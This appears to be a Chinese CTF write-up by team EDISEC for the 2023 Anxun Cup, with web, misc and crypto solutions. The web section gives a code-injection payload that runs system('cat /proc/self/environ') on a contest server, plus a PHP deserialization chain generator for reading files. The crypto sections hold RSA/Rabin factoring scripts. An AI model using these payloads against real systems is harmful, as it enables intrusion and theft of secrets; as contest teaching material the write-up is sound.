2023安洵杯 - WriteUp By EDISEC

2023年12月28日08:38:33评论34 views字数 18274阅读60分54秒阅读模式

Web

what's my name

参考：https://www.cnblogs.com/-chenxs/p/11459374.html

先本地测一下

2023安洵杯 - WriteUp By EDISEC

$miao后面的数值刷新会不断增大，那么我们直接重复发包就好，$miao后两位的数字迟早会等于的$d0g3的长度的

后来一直没过$name===$miao 这个判断。。。

直接按位输出一下ascii看看，原来前面还有个空字符，用$name前面加个%00就行。

2023安洵杯 - WriteUp By EDISEC

payload

GET /?d0g3='"]);}eval(system('cat+/proc/self/environ'));/****include&name=%00lambda_57 HTTP/1.1Host: 47.108.206.43:37236User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1

easy_unserialize

链子有点长调来调去的

<?phpclass Good{    public $g1;    private $gg2;

    public function __construct($ggg3){        $this->gg2 = $ggg3;    }

    public function __isset($arg1){

        if(!preg_match("/a-zA-Z0-9~-=!^+()/",$this->gg2))        {            if ($this->gg2)            {                echo "__isset";                $this->g1->g1=666;            }        }else{            die("No");        }    }}class Luck{    public $l1;    public $ll2;    private $md5;    public $lll3;    public function __construct($a){        $this->md5 = $a;    }    public function __toString(){        echo  "__toString";        $new = $this->l1;        return $new();    }

    public function __get($arg1){        echo "__get";        $this->ll2->ll2('b2');    }

    public function __unset($arg1){        if(md5(md5($this->md5)) == 666)        {            if(empty($this->lll3->lll3)){                echo "There is noting";            }        }    }}

class To{    public $t1;    public $tt2;    public $arg1;    public function  __call($arg1,$arg2){

        if(urldecode($this->arg1)===base64_decode($this->arg1))        {            echo "__call";            echo $this->t1;        }    }    public function __set($arg1,$arg2){        echo "__set";        if($this->tt2->tt2)        {            echo "what are you doing?";        }    }}class You{    public $y1;    public function __wakeup(){        unset($this->y1->y1);    }}class Flag{    public function __invoke(){        var_dump($this);        echo "May be you can get what you want here";        array_walk($this, function ($one, $two) {            var_dump($one);            var_dump($two);            $three = new $two($one);            foreach($three as $tmp){                echo ($tmp.'<br>');            }        });    }}

$one = "/FfffLlllLaAaaggGgGg";  $l1 = new Flag();$l1->SplFileObject = $one;        // 先用DirectoryIterator 查看flag路径 $md5 = '213';                     //上面的one 改成 /$t1 = new Luck($md5);$t1->l1=$l1;$arg1 = array();$ll2 = new To();$ll2->t1=$t1;$ll2->arg1=$arg1;$md5 = "213";$tt2 = new Luck($md5);$tt2->ll2=$ll2;$To = new To();$To->tt2=$tt2;$ggg3 = "$";$lll3= new Good($ggg3);$lll3->g1=$To;$md5 = "213";$Luck = new Luck($md5);$Luck->lll3=$lll3;$You = new You();$You->y1=$Luck;$poc = serialize($You);echo urlencode($poc);?>

flag{6b531f4a-a15a-11ee-88e5-00163e0447d0}

Misc

Nahida

2023安洵杯 - WriteUp By EDISEC

通过010不难观察发现是个jpg，利用cyberchef转换

2023安洵杯 - WriteUp By EDISEC

cyberchef吃数据(冗余数据还原成中文，用silenteye了应该是。。。

2023安洵杯 - WriteUp By EDISEC

misc-dacongのsecret[赛后复现]

2023安洵杯 - WriteUp By EDISEC

单图FFT盲水印得到上图；利用密码解开压缩包得到新的jpg图片，分析发现尾部有压缩包。

2023安洵杯 - WriteUp By EDISEC

逆序取出zip，需要密码根据提示继续分析png

从Pngcheck的结果来看，上一个Png的尾块IDAT块显然是冗余的，不妨提取出来作为单独的png，补全头和尾再进行宽高的爆破，这里用puzzlesolve。

2023安洵杯 - WriteUp By EDISEC

拿到第二个压缩包的密码

2023安洵杯 - WriteUp By EDISEC

解开压缩包，base64隐写，拿到密钥

2023安洵杯 - WriteUp By EDISEC

flag{d@C0ng_1s_r3@lIy_Re@iLY_Cute}

Crypto

010101

第一步就是proof of work，

经过代码的本地测试，实际处理，就是p值错0,1,2个bit，过proof of work以后，只需要逐位校验即可，过滤出所有的素数，然后测试是否为n的一个因子即可，分解完成即可求得flag：

from pwn import *import itertools,hashlibimport stringimport refrom gmpy2 import *from functools import reducefrom Crypto.Util.number import *





io = remote('124.71.177.14', 10001)strr = io.recvline().strip()print(strr)'''s1,s2 = strr.strip().split(b'n')print(strr)print(s1)'''s3,h = strr.split(b':')print(s3)#print(h)ha = h.strip()print(ha)s4,s5 = s3.split(b'+')s6= s5.strip().replace(b')',b'')print(s6)

chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'for t in itertools.product(chars, repeat=4):    w = ''.join(t)    x = s6    test = hashlib.sha256((w+x.decode()).encode()).hexdigest().encode()    #print(test)    if test == ha:        print(w)        breakp1 = wio.recvuntil(b':')io.sendline(p1)#io.recvuntil(b'Press 1 to get ciphertextn')io.sendline(b'1')io.recvline()io.recvline()n = io.recvline().replace(b'n',b'')p = io.recvline().replace(b'n',b'')c = io.recvline().replace(b'n',b'')pp = int(p,2)print(n)print(p)print(c)print(isPrime(pp))io.interactive()

逐位爆破：

# -*- coding: utf-8 -*-"""Created on Sat Dec 23 14:53:58 2023

@author: zwhub"""



from Crypto.Util.number import *from gmpy2 import *

def check_and_convert(binary_string):    prime_numbers = []    for i in range(len(binary_string)):        flipped_string = binary_string[:i] + str(1 - int(binary_string[i])) + binary_string[i+1:]        number = int(flipped_string, 2)        if is_prime(number):            prime_numbers.append(number)    return prime_numbers



binary_string = "11010110011101001110000110000111111100110011110101010110101001001111101101001011110100000100111000001111110011101011010001011011000110001100101110110101010110010001011101101101100110000011010110000111011011101010110010110010001101000000001010111101110000000010000101011011010111000111001111010011110010011001000001101000100101011000110110111101111101010010100101101100010011111111000000010000001001111101101001110100011111100110010011011011101010110011111101100011011001000011001111001001010100101000101111101000010111100110101100000000110100011111010010110010111100110101000110100000001110010110010010110111101001011100100101110101001010111100100101101010101101101110100000110011111010000011000000100010001111100010110110011110100001110000001010011001110101110100001000011001101111010101011101110100101000001111010001001101111100111110100101110110010001111010111010100101011011110101001011000000001001000111100101000101101101010011100010111001011010000001100010011111101000101101001010011111111100101011110011010100110001110010100011000011010110100010010001101001100011110101001011101110011111110010110111101110111100000110010101000000110110000100010101011110010001111100110111111000111110111110011101001100001100111010001100000011111110100010010110000011001011110100010011000100101011000000011011101010110100011100010100111001101111100100000011110101110110000111101010001111011111010001011110101001000101000010110011111000110011000011101011000001010110101001101100100001000111001111000111000101001010100000001110101011100110110111000011010101101101110001111101001101011000100100111011000110111111101001101100111111000111011111110110010011010101001011110111100011001110000011110011001011000011010110110100110010111111001110001010011011000100111000100000100110011010100100111001000001100100010100101000101101100111000000001111101101010111111101111000100101000111011100110000010011001011111010100101011001111100100110100010110101111101001110011101000010101011110001110001100010111010100011100111111011101000001001010111011101100111100011011000101001"

prime_numbers = check_and_convert(binary_string)

pp = prime_numbersn = 851294229068035786370272156858678289487548167899412914269211060855957578006972380605995394133080485793121849082520577575353812227053732530074654005278682486680823951157798448875760358196146750352072010307928833537226843001002101028800343878928029652008410143768298461913684276754443407016820694847133724093335055221246095109029589612178727687207753307510933523763538651137423859309102470609221318384219930917458997920728555614187452052717296736440971409026374958404218529057682430970618387104545709480405868195142446414345805845438688795621565629000493467296174990870550780074771392374181951688555993274391041895402291885491036510965790233636624257217479412319725338919435315853264852853910554063001491619806575805912505641655819031634873893632182077270796589813033493973879959050865902183271114527380006473750085240540881323507343348375602047816472120949410916596802938359302583544653491500513139000463987169016099022148861110105720022298559222511329821317796394503901465180570934608808529803042902024032417785526179302850590362470812528525787110849843748934722698087312304699270111634688077531733624641351834560131573269149078476735687481155084421285236272198845832423034652330211069156868935691027284240126949684578499668834992349e = 0x10001c = 817370527656686076332447341471548462783847809446816486934341997101652241275288872022820956059512497293398218107944520515342645165995031033795657638215333561052534816891355400727623631803433540490258918561607744695572733133535871108752088321065313994544002437069743244174102031098834199438846418399831349654458096914843605463712413287667040446474231367370699343840492356566067691991043557300288351882198700788467301512882040100874895763768100402452374026533640009448048982656973770683330004922549778366239451902317478381159881939530126936611058164350356801026787179555344470733081641693046103019180955543588400442670162325573232968757916424982369269810084874266371409884594563093543749391295863836255329795018846692384614600836875019710470570546621138084754896683120934111307462940602993965097992123764755597598599217862867656308496528173892309551341976247056357300116156349175611955720467539312628881095925981007115325573375896965405146363992577952014400220220572068825373499455961513839147967074164428014762904588920135917120252811162657216043238170653448537633867261987437595253044863910560575957044044379215702876827183769498367582669507718261343932263924509348939748672404960494725533702147606349604697746549418290098816320934508

for i in pp:    q = n // i    if i*q == n:        p = i        print(p)        phi = (p - 1)*(q - 1)        d = invert(e,phi)        m = pow(c,d,n)        print(long_to_bytes(m))        break

2023安洵杯 - WriteUp By EDISEC

flag：D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}

rabin

首先还是过proofofwork，这个用上一题的就行了，获得数据：

n = 212373490692860326225006394373965222365583518797684198779710699042499426556263173158236749890683898742263923181576464969459091256996825869450834956484316865838881696246946422135830132234289226005791186091504985370381407727002472361831503894107603575679670705188662800367942059491116867936919211111180401133861650569134738337081704505307462794283225166154412239182440488119623389201527430500311725373864593399593681738028225053627441929920269020661056042410650576130736125794514758998929832471512395307823503874617053568091304365860857934350504239598713056161759237414301421183183921582275334218228457475445048949904616231884046162948134161421004916879289840191523754722865993265412396331291988962681809059157189670968635958529325367799911705118064693259437298144199127496861959708567049815694874799223476419854146356290808186638731871640403726960270485625575903956068614422035375699384768519430165375606151909031089630668383705634193316427624111895467172774685681841871112664353089252455983535397198207inv_p = 56573845963096327869513640212737711026359666316803574884303727365016852242466120180111613737831185027579749339663601048817116821309187434284645053920559617069802139109843485798696598421795116790575544859860295693379458788936217876738719535657637904216023706327260149228177815463157158876624238872805046214522inv_q = 83001529204168151731929999420717881347371914952845656410081236063436279995743679496028710403219893268803456838918579673833744283243202229989449685118611749073838396816670980613895026491742524907359144602379767142658742930204073714333874704453393496997797091368610886038136413817517253702128681113245496728508c1 = 83290468046109205364191873899713823034418031465422526699867318879592829993612970207982741541472948895002891405137533133978921456342620317431687489575979222548731057093972517891649165877631799125816337523011818027473945299920648573270536370761233732126531912638675667422761820865381429812175748656474790769429863555517631839096286360616980201760463389779634053464494647438425693637962944378142042372020498559550603388129135418859812864610999474620305958393747953965648381720903881867128432705889652610759456141417218048889890262283375515257645646569441344702884959539238545581599901081788188175562072095920530372802496073921559366637595052435178995331865898041967644840602661040976194093486489733068973080550057948392756967093981581932712897972235465708544129268275632296156665207661551568716394597200507803466027731721213771465499709434122682732768908043244595555056165969526645874463749234338164911498886007719232538342113945322351764020567222777662471740738576219252748229810994392261928958694131257c2 = 153535991032878567415201652028728214500001812799828915111023584577704915838349626520869732563333169049632694878210164430731188296207624651875009819457867361037555188319167127596937989683208138690647613445498301528822029331533061436392684207384657977564078353439162533554130508875416586430112975477852354812017563795350010049045278367426799293770007571054673266408380098823260616587540804114786570922491406112053919245668719584357262450648414997253823244210987692306341239110934605704403399256715255504523549243361117402558743225705228198097790916631280923107945253313197773037903234475459009088904844374538058539658302765478798865740345312462636234150792777998497367927846063353478827310985359406448412273138272703584190242253774729395315813687072255475719057691468815992567913762876095685795783899813112464015622714898533108940611871150464907656131994912460149400607032186596147226979852921610817755456602314024889256958799295485355378655179998153343394562998492836171129345207489414612120520702914661

光滑数可以分解出r

import gmpy2from Crypto.Util.number import *

def Pollards_p_1(N):    a = 2    n = 2    while True:        a = pow(a, n, N)        res = gmpy2.gcd(a - 1, N)        if res != 1 and res != N:            print 'n =', n            print 'p =', res            return res        n += 1

n = 212373490692860326225006394373965222365583518797684198779710699042499426556263173158236749890683898742263923181576464969459091256996825869450834956484316865838881696246946422135830132234289226005791186091504985370381407727002472361831503894107603575679670705188662800367942059491116867936919211111180401133861650569134738337081704505307462794283225166154412239182440488119623389201527430500311725373864593399593681738028225053627441929920269020661056042410650576130736125794514758998929832471512395307823503874617053568091304365860857934350504239598713056161759237414301421183183921582275334218228457475445048949904616231884046162948134161421004916879289840191523754722865993265412396331291988962681809059157189670968635958529325367799911705118064693259437298144199127496861959708567049815694874799223476419854146356290808186638731871640403726960270485625575903956068614422035375699384768519430165375606151909031089630668383705634193316427624111895467172774685681841871112664353089252455983535397198207

p = Pollards_p_1(n)print p

2023安洵杯 - WriteUp By EDISEC

并且得到x=8，于是就可以得到p*q的值，于是可以根据q^-1,p^-1的值来建立等式，求解方程，得到pq。

2023安洵杯 - WriteUp By EDISEC

然后就是题目已知了phi = (p-1)*(q-1)*(q-1)，e2*d =1 mod phi，可以先爆破e2。

from gmpy2 import *from Crypto.Util.number import *from tqdm import tqdmimport string

r = 10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087

n = 212373490692860326225006394373965222365583518797684198779710699042499426556263173158236749890683898742263923181576464969459091256996825869450834956484316865838881696246946422135830132234289226005791186091504985370381407727002472361831503894107603575679670705188662800367942059491116867936919211111180401133861650569134738337081704505307462794283225166154412239182440488119623389201527430500311725373864593399593681738028225053627441929920269020661056042410650576130736125794514758998929832471512395307823503874617053568091304365860857934350504239598713056161759237414301421183183921582275334218228457475445048949904616231884046162948134161421004916879289840191523754722865993265412396331291988962681809059157189670968635958529325367799911705118064693259437298144199127496861959708567049815694874799223476419854146356290808186638731871640403726960270485625575903956068614422035375699384768519430165375606151909031089630668383705634193316427624111895467172774685681841871112664353089252455983535397198207

c1 = 83290468046109205364191873899713823034418031465422526699867318879592829993612970207982741541472948895002891405137533133978921456342620317431687489575979222548731057093972517891649165877631799125816337523011818027473945299920648573270536370761233732126531912638675667422761820865381429812175748656474790769429863555517631839096286360616980201760463389779634053464494647438425693637962944378142042372020498559550603388129135418859812864610999474620305958393747953965648381720903881867128432705889652610759456141417218048889890262283375515257645646569441344702884959539238545581599901081788188175562072095920530372802496073921559366637595052435178995331865898041967644840602661040976194093486489733068973080550057948392756967093981581932712897972235465708544129268275632296156665207661551568716394597200507803466027731721213771465499709434122682732768908043244595555056165969526645874463749234338164911498886007719232538342113945322351764020567222777662471740738576219252748229810994392261928958694131257c2 = 153535991032878567415201652028728214500001812799828915111023584577704915838349626520869732563333169049632694878210164430731188296207624651875009819457867361037555188319167127596937989683208138690647613445498301528822029331533061436392684207384657977564078353439162533554130508875416586430112975477852354812017563795350010049045278367426799293770007571054673266408380098823260616587540804114786570922491406112053919245668719584357262450648414997253823244210987692306341239110934605704403399256715255504523549243361117402558743225705228198097790916631280923107945253313197773037903234475459009088904844374538058539658302765478798865740345312462636234150792777998497367927846063353478827310985359406448412273138272703584190242253774729395315813687072255475719057691468815992567913762876095685795783899813112464015622714898533108940611871150464907656131994912460149400607032186596147226979852921610817755456602314024889256958799295485355378655179998153343394562998492836171129345207489414612120520702914661

nn = n // rprint(nn)p = 129492677879640361898569564489440604028112363755884867492416678820540698413191519941443858935354376329119233276575339313679348651896429690313729715970716187875736416207262237146065316452990475298865758111531390481111337959004315956278375471242206273913929591898853888274453964194554448742839870287428293861443q = 157576205803162293134377345989898139756698491293986968570611950827939391559516661797282161210528757569240320736635927143263730659592997096526188053008019309559942202105760275808958411880385293479048010769901286991849555916101683350527252070125028475841559156815174113941986160623175189651608622010157410075627



print(p*q*r==n)phi = (p - 1)*(q - 1)

for e in tqdm(range(3, 100)):    try:        d = invert(e,phi)        m = pow(c2,d,p*q)        tt = long_to_bytes(m)        if '}' in tt and tt[0] in string.printable and tt[1] in string.printable:            print(e)            print long_to_bytes(m)    except:        pass

2023安洵杯 - WriteUp By EDISEC

e2=5，根据关系函数，可以推得e1=2，通过rabin即可

2023安洵杯 - WriteUp By EDISEC

Flag： D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}

原文始发于微信公众号（EDI安全）：2023安洵杯 - WriteUp By EDISEC

左青龙
微信扫一扫

右白虎
微信扫一扫

2023安洵杯 - WriteUp By EDISEC

ctf工控流量题

AVSS 2024 Writeup Polaris战队

2024警察大学第七届精武杯电子数据取证技能比武暨信息安全协会社团邀请赛参考wp

国科ctf python脚本 ctf常用python库

一文入门AndroidCTF：以攻防世界#基础Android为例

BUUCTF--rsa

Omron Fins

工控CTF之协议分析7——OMRON

入坑CTF的第一篇CRC32爆破【MISC】

AliyunCTF 2024 - BadApple

发表评论

在线咨询

微信